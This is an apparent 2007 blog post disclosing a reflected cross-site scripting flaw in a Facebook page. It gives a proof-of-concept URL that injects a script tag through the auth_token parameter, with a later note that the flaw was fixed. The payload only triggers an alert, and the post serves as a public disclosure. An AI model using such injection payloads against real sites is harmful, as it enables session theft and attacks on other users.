Thursday 1 November 2007

Facebook XSS Vulnerability

Hey Peepz,

So, browsing away on Facebook the other week, then i wondered if Facebook was as riddled with holes like MySpace was a while back. It seems not...but still has a few ;)

Anyways, I don't need to explain to you the possibilities of what you can do with XSS and a social networking website so I'll just give you the vulnerability.

PoC:
http://www.facebook.com/tos.php?api_key=cc56c58d50d83b35691e7b1783ca925f&auth_token=
%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E


I heard Facebook were pretty swift with their patches, let's put that to the test...clock's ticking.

Silentz

EDIT:
Fixed as of 05/11/07

1 comment:

Anonymous said...

Nice find, Silentz.

And your XSS hole at Facebook still working ;-). This guys need to work faster to fix security issues.